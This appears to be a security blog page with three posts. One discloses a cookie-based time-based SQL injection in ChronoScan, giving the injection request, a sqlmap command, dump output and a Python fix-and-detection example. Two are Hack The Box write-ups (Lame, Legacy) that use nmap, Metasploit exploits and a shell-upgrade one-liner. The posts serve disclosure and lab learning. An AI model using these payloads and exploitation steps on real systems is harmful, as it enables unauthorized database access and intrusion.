RedSec

Another Information Security Blog

Background

ChronoScan is OCR software created by ChronoScan Capture S.L. that reads and parses data from the documents it receives. The software takes a document or PDF and, based on how you have it set up, extracts selected data from the input file. This is especially helpful where an automated process sends a high number of documents that need to be loaded into a database or some other type of storage quickly. It is offered in community and enterprise versions.

Vulnerability

I've identified an unauthenticated time-based SQL injection in the latest ChronoScan enterprise version (v1.5.4.3 as of 8-24-2018). This vulnerability has not yet been confirmed on other versions, but due to the nature of the attack (unauthenticated, no specific parameters, etc.) I believe it is present in all versions up to this point. I will update this post when the vendor has confirmed which versions are affected.

The vulnerability lies in how the wcr_machineid cookie is used to identify users and the sessions associated with them. It appears that the wcr_machineid cookie value is inserted unsanitized into a SQL statement that checks the current machine's access level. An unauthenticated attacker (even without a valid wcr_machineid cookie) can exploit this as a time-based SQL injection. Below is the request that was originally used for identification.

GET / HTTP/1.1
Host: vulnerable:10000
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Referer: http://vulnerable:10000/?wtd=VQWist5qQW3IS6uy
Cookie: wcr_machineid=')waitfor%20delay'0%3a0%3a20'--; wcr_uspw=deleted; wcr_repw=1

If you compare this request (which injects a delay of 20 seconds) to one without the SQL statement, you will see that the response takes ~20 seconds longer to come back. I took this and ran the following sqlmap command, which confirmed the vulnerability.

sqlmap -u "http://vulnerable:10000" --cookie="wcr_machineid=*;wcr_uspw=deleted;wcr_repw=1"

After confirmation, I dumped the following databases.

[*] CHRONOSCAN
[*] master
[*] model
[*] msdb
[*] tempdb

Dumping the tables (60 total) from the CHRONOSCAN database gave me the following.

[12:01:33] [INFO] fetching tables for database: CHRONOSCAN
[12:01:33] [INFO] fetching number of tables for database 'CHRONOSCAN'
[12:01:33] [INFO] resumed: 60
[12:01:33] [INFO] resumed: dbo.chrono_Buyers
[12:01:33] [INFO] resumed: dbo.chrono_Suppliers
[12:01:33] [INFO] resumed: dbo.chronosys_csi_export_history
[12:01:33] [INFO] resumed: dbo.chronosys_csi_user_params
[12:01:33] [INFO] resumed: dbo.chronosys_doctype_options
[12:01:33] [INFO] resumed: dbo.chronosys_entities
[12:01:33] [INFO] resumed: dbo.chronosys_entities_params
[12:01:33] [INFO] resumed: dbo.chronosys_entity_masterkey_line_account
[12:01:33] [INFO] resumed: dbo.chronosys_event_track
[12:01:33] [INFO] resumed: dbo.chronosys_job_types_cache
(snip)
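To make the defect concrete, here is an added example (not ChronoScan's code) of the cookie-to-SQL pattern described above, its parameterized fix, and a log-side check for the time-based payload shape. The table and column names are assumptions, and sqlite3 stands in for the real MSSQL backend; the cookie value is the one from the request shown earlier, URL-decoded.

```python
import re
import sqlite3
from urllib.parse import unquote

# Cookie value from the request above, URL-decoded (a T-SQL WAITFOR DELAY payload)
INJECTED_COOKIE = unquote("')waitfor%20delay'0%3a0%3a20'--")


def build_query_unsafe(machine_id: str) -> str:
    # The defect: cookie text is pasted into the statement, so quotes in the
    # value change the meaning of the SQL (table/column names are assumed)
    return f"SELECT access_level FROM machines WHERE machine_id=('{machine_id}')"


def lookup_access_level(conn: sqlite3.Connection, machine_id: str):
    # The fix: bind the cookie as a parameter; the driver never parses it as SQL
    row = conn.execute(
        "SELECT access_level FROM machines WHERE machine_id=?", (machine_id,)
    ).fetchone()
    return row[0] if row else None


# Detection: a quote or closing paren directly followed by a SQL delay keyword
_DELAY_RE = re.compile(r"['\")]\s*(waitfor\s+delay|sleep\s*\(|pg_sleep\s*\()", re.I)


def suspicious_cookies(cookie_header: str) -> list:
    """Return names of cookies whose decoded value looks like a time-based payload."""
    hits = []
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name and _DELAY_RE.search(unquote(value)):
            hits.append(name)
    return hits


def make_demo_db() -> sqlite3.Connection:
    # Constructed sample data: one legitimate machine row
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE machines(machine_id TEXT, access_level TEXT)")
    conn.execute("INSERT INTO machines VALUES ('abc123', 'user')")
    return conn


if __name__ == "__main__":
    conn = make_demo_db()
    print("unsafe statement:", build_query_unsafe(INJECTED_COOKIE))
    print("bound lookup with payload:", lookup_access_level(conn, INJECTED_COOKIE))
    print("flagged cookies:", suspicious_cookies(
        "wcr_machineid=')waitfor%20delay'0%3a0%3a20'--; wcr_uspw=deleted; wcr_repw=1"))
```

With parameter binding the payload is just a machine id that matches no row, and the same check over a web server's Cookie headers surfaces the probing request used for identification.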

Timeline

-August 24, 2018: Vulnerability identified
-August 24, 2018: Vendor notified and acknowledged
-August 24, 2018: CVE ID requested
-August 24, 2018: CVE-2018-15868 reserved
-August 27, 2018: Details provided to MITRE
-August 28, 2018: Vendor issues patch for verification (not public yet)

The “Lame” box was categorized as an easy-intermediate box, so I decided that it would be next on my list.

I found it to be fairly easy, giving it a 2 out of 10 for difficulty.


Intelligence Gathering

Data Given: IP: 10.10.10.3 OS: Linux

I first pinged the host and confirmed that it was up. I then ran the following nmap scan for a general sweep of which ports were open. I do these types of scans to find any low-hanging fruit that may be there.

nmap -sS -sC -sV -T4 10.10.10.3

Okay, so we have a few things that look interesting. The out-of-date vsftpd and Samba are probably how we want to get in. I looked around online for the Samba version, as I thought I had heard of a large exploit for it recently. Luckily, Rapid7 had a module at the top of my search.

The version that nmap reported was “3.0.20”, which matches the version that Rapid7 lists for the “username map script” RCE.


Exploitation

This module does not support checking, so we are going to have to trust that nmap was not lying to us.


Post Exploitation

It wasn't! Unfortunately, this dropped us into a limited shell. Pentest Monkey (http://pentestmonkey.net/blog/post-exploitation-without-a-tty) has a great way to gain a full TTY shell. Since I am comfortable with Python, I used the whereis python command to see if it was installed.

Now that I know it is installed (and I can use it), I run the following command to gain a full TTY shell.

python -c 'import pty; pty.spawn("/bin/sh")'

We are already root, so let's grab the flags and move on to the next one.


Conclusion

I did have a trip-up when I was initially trying to hack this box. I went for the vsftpd daemon first, but for some reason couldn't get a shell back. I'm going to attribute the name “lame” to that very reason. I liked this one, but I think in the future I am going to stop relying on Metasploit so much and try to learn to use Python/Ruby scripts to send the exploits.

After taking a break from writing blogs about hacking, I thought I'd jump back into it. This write up is going to be covering the “Legacy” box from Hack The Box. If you haven't seen or heard about Hack The Box, I highly recommend you try it out.

I chose Legacy as it is a retired box, which means you can do a write-up about it. I will be trying to hack all of the retired boxes and writing about my experiences.

Intelligence Gathering

Data given: IP: 10.10.10.4 OS: Windows

I first pinged the remote host to confirm it was online. I then ran an nmap scan with the parameters below.

nmap 10.10.10.4

Knowing that ports 139 and 445 were open, I ran a more targeted scan to enumerate more about those services.

nmap -sC -sV -A -p139,445,3389 10.10.10.4

This is a much more interesting scan result. It looks to be a Windows XP or 2000 box. I assume the name of the box, “Legacy”, refers to the version.


Vulnerability Analysis

I did a quick search with searchsploit for “Windows 2000” and noticed this result.


Exploitation

I fired up Metasploit and loaded the module for MS08-067.

I set the target to the remote host and, to verify that it was actually vulnerable, I used the “check” command in Metasploit.

Sweet! Let's exploit now! Awesome, it worked!


Post Exploitation

The next goal is to get the flags for both the user and root (Administrator in this case). Both flags are on each user's desktop. To do this, I'll drop into a shell session on the host. I need to see if I can get the flags without having to do any sort of privesc. I was able to grab the user flag without any privesc. Now, let's try the same thing for the Administrator account. Alright! That wasn't bad at all. On to the next one!


Conclusion

This was a very easy lab that had us use MS08-067 on a Windows XP computer. I didn't use any outside resources on this one besides searchsploit, which can be found here. Looking forward to the next one!